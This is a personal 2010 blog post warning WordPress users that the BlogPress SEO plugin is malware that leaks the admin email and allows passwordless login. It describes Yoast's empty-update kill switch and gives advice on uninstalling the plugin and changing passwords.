November 14, 2010

Is That WordPress Plugin Update Really MALWARE Instead? How to check.


Today is wondrous Sunday!  The day I was supposed to (get this, I hope you're sitting down) "rest" (OMG!) and "take a break"  (Jeepers, say it ain't so!)

And I was, honestly and truly.

I really was!


Until I read this chilling post, and realized – I simply *have* to alert my readers.

BlogPress SEO: solved

Now, Yoast is beyond brilliant when it comes to WordPress; his blog is something you simply must follow (you can subscribe by email here or grab his RSS feed here).

Anywhos, there I was, blissfully consuming my 34th cup of coffee, wrapped up in my nice fluffy blue 21 year old house coat (funny how you just cannot get rid of down-home comforts, eh?) and simply enjoying my 4am.

I'll bet you're familiar with my state of being, right? 

After all, imagine that you had just awakened, your family was still happily asleep so you could (sit down again, another impossible scenario is steamrolling to you this instant) get some work done, and you fire up your feedreader.

Figuring that you'd start checking out what your peers were writing, you calmly scroll through your entries and then you read…..THIS.

…I thought BlogPress SEO was bad, turns out, it's worse. It's malware. I had already discovered that it sent the admin email to the plugin's author, but today, mtekk uncovered that it was adding an option to log in, solely with that email address. Yes that's bad. I checked out the plugin code again, and noticed something that could solve all this….MORE….

Now, I don't know about you, but put the words:

  • malware


  • admin email


  • wordpress plugin

all together, and you've concocted a sure-fire recipe for me to leap up in a state of extreme agitation (without spilling a drop of coffee, mind you, I'm not that hopeless) and shriek to the monitor:

"Jeepers self, shall I covertly panic now or in 2 seconds?"

Luckily sanity did prevail (raising a passel of kids and mooses and Twitter Budgies does that for me) and I continued reading.

Here's what happened.

NOTE!1.)  A WordPress plugin was created on a site that promised:

We have developed a superb wordpress plugin which can actually get 100's of backlinks like crazy, all on autopilot.  As soon as you install the plugin, the plugin will find all relevant blogs in the network which are similar to your niche. So if you write about dogs then the plugin will find all blogs which talk about dogs. Once the plugin find the relevant blogs, it will mutually exchange links between the blogs. So if you have 300 posts in your blog then it will find 300 similar posts in the network, and in turn mutually links with those posts. So you will get around 300 backlinks right away. The more you write the more backlinks will be found by the plugin for your posts. This is a ongoing process and I can assure you that you will see gradual increase in traffic over time. ….MORE…..

NOTE!2.)  The download was from the original site, NOT the WordPress plugin repository.

In other words, that made sure no security checks were possible.

Can you say," Danger Will Robinson?"

NOTE!3.)  The BlogPress SEO plugin was written to steal your admin login info AND make it possible to login to your WordPress blog without a password.

To quote  Yoast :

Update: It get's worse. As pointed out by this post, BlogPress SEO is pure malware, as it contains a function that allows someone who knows your admin email address (you know, the one they just sent to themselves when you installed the plugin) to log in without a password… That's purely criminal.

That post was written by mtekkmonkey, that blog can be found over at M'tekk's Crib  and the feed is here (definitely add!).

So I'll bet you're wondering just what mistake the plugin author made?

You'll love this:

NOTE!4.)  The BlogPress SEO WordPress plugin author wrote to BOTH Yoast AND mtekkmonkey and asked for a review.




Wow wow wow wow.

But here's a quick fix Yoast inflicted on that malware BlogPress WordPress Plugin!

This is sheer brilliance.

…With permission, he made a blank plugin by the same name over at the WordPress Repository that simply had a higher version number.

To wit:

With the help of Andrew Nacin, I registered blogpressseo as a plugin on, created an empty plugin file with the same name and a higher version number, added a readme.txt with an upgrade notice, and uploaded it to….

I had already installed the plugin on my blog (well, an empty version of it, just the headers), so I could test it, and low and behold, it worked…

It's a primitive form of a kill switch (which I wish WordPress had, but it's better than nothing). The funny thing is: we'll now also be able to see how many people are running this plugin and how many of them upgrade. So far, 26 people have been saved!…MORE….

Wasn't that smart of him?

Which brings me now to:

What *you*, gentle reader, need to do *now*

If you've installed the Blogpress SEO plugin, *uninstall* it now.

Change your admin password.

And tell all of your network about this problem (feel free to point them to this site if needed).

In closing

When finding a nifty-neato WordPress plugin, you need to search for it FIRST on Google like so:

to see if anyone has experienced any problems already. 


An educated blogger is always the best kind of blogger!

And one last thing:

Ideally, always and only download WordPress plugins from the official WordPress Plugin Repository.

While it's still no absolute guarantee of safety, it's as near as that as you can get.

Want more information?  Check out:

Hope you found this article useful!   It sure caught my attention, indeed.

Grow strong,

Barbara Ling

Click Here to Leave a Comment Below

Leave a Reply: